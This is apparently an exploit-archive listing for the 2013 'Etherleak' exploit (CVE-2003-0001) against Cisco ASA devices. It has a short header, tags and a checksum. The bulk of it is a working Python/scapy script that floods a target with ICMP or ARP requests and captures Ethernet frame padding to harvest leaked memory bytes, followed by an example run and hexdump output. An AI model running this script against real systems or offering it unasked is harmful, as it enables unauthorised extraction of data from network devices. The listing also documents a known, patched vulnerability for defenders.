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Cisco ASA Ethernet Information Leak

Cisco ASA Ethernet Information Leak
Posted Jun 10, 2013
Authored by prdelka

This is the Cisco ASA ethernet information leak exploit that leverages the vulnerability noted in CVE-2003-0001. Versions prior to 8.4.4.6 and 8.2.5.32 are affected.

tags | exploit
systems | cisco
advisories | CVE-2003-0001
SHA-256 | ada92ec408b17ad98b8a34bbb874aa0239b2511cafe8e2286f516be9b06a52b8

Cisco ASA Ethernet Information Leak

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#!/usr/bin/env python
# CVE-2003-0001 'Etherleak' exploit
# =================================
# Exploit for hosts which use a network device driver that pads
# ethernet frames with data which vary from one packet to another,
# likely taken from kernel memory, system memory allocated to
# the device driver, or a hardware buffer on its network interface
# card. Exploit uses scapy with either ICMP or ARP requests as
# this can trigger with either but ICMP can hit layer3 filtering
# rules. Using ARP the padding appears to leak only fixed constant
# values when exploited, ICMP leaks random bytes.
#
# root@bt:~/0d# python cve-2003-0001.py x.x.x.254 icmp leaky
# WARNING: No route found for IPv6 destination :: (no default route?)
# [ CVE-2003-0001 'Etherleak' exploit
# [ Attacking x.x.x.254 for icmp padding saved to leaky.hex
# ............................................................^C!Killing
# !Killing
# root@bt:~/0d# hexdump -C leaky | head
# 00000000 e6 bd a6 9b 90 eb 44 f5 18 a5 29 2a 16 5a 08 ff |......D...)*.Z..|
# 00000010 43 e1 23 07 8f 96 5a 24 3f 3d 33 7d b4 97 7e 18 |C.#...Z$?=3}..~.|
# 00000020 05 c9 7c 2c a5 c0 fa 7a 76 f3 51 c0 fe 07 72 32 |..|,...zv.Q...r2|
# 00000030 9e ad 6a 67 ad 43 58 17 60 43 bc 2b b8 fb cc 70 |..jg.CX.`C.+...p|
# 00000040 99 92 80 84 03 03 6f 8f 18 d3 5b 5e f0 1e 3a 83 |......o...[^..:.|
# 00000050 3d 82 e7 cd 3e 1f 31 74 b0 06 8c a2 7e 14 6b fb |=...>.1t....~.k.|
# 00000060 72 9b ac 64 74 9b a4 d9 23 5b 92 82 0d 0b 31 f0 |r..dt...#[....1.|
# 00000070 a9 4f dd 3f bf 2b 5c 67 6c 22 fa da d0 2b d6 39 |.O.?.+\gl"...+.9|
# 00000080 40 58 13 4f 3d bb 48 03 d3 53 3c 5c 44 d2 3d b2 |@X.O=.H..S<\D.=.|
# 00000090 4f f2 a9 4a 02 80 4e 1b 6c bd 69 89 bd 76 1b 0a |O..J..N.l.i..v..|
#
# This issue has been resolved in ASA 8.4.4.6/8.2.5.32. Cisco Bug reference
# is CSCua88376 and PSIRT-0669464365.
#
# -- prdelka
#
import os
import sys
import signal
import binascii
from scapy.all import *

def signalhandler(signal,id):
print "!Killing"
sys.exit(0)

def spawn(host,type):
if type == 'arp':
send(ARP(pdst=host),loop=1,nofilter=1)
elif type == 'icmp':
send(IP(dst=host)/ICMP(type=8)/'x',loop=1,nofilter=1)

if __name__ == "__main__":
print "[ CVE-2003-0001 'Etherleak' exploit"
signal.signal(signal.SIGINT,signalhandler)
if len(sys.argv) < 4:
print "[ No! Use with <host> <arp|icmp> <file>"
sys.exit(1)
type = sys.argv[2]
if type == 'arp':
pass
elif type == 'icmp':
pass
else:
print "Bad type!"
sys.exit(0)
pid = os.fork()
if(pid):
print "[ Attacking %s for %s padding saved to %s.hex" % (sys.argv[1],sys.argv[2],sys.argv[3])
spawn(sys.argv[1],sys.argv[2])
while True:
if type == 'arp':
myfilter = "host %s and arp" % sys.argv[1]
elif type == 'icmp':
myfilter = "host %s and icmp" % sys.argv[1]
x = sniff(count=1,filter=myfilter,lfilter=lambda x: x.haslayer(Padding))
p = x[0]
if type == 'arp':
pad = p.getlayer(2)
if type == 'icmp':
pad = p.getlayer(4)
leak = str(pad)
hexfull = binascii.b2a_hex(leak)
file = "%s.hex"%sys.argv[3]
fdesc = open(file,"a")
fdesc.write(hexfull + "\n")
fdesc.close()
# 32 bits leaked here for me.
if type == 'icmp':
bytes = leak[9:13]
elif type == 'arp':
bytes = leak[10:14]
fdesc = open(sys.argv[3],"ab")
fdesc.write(bytes)
fdesc.close()


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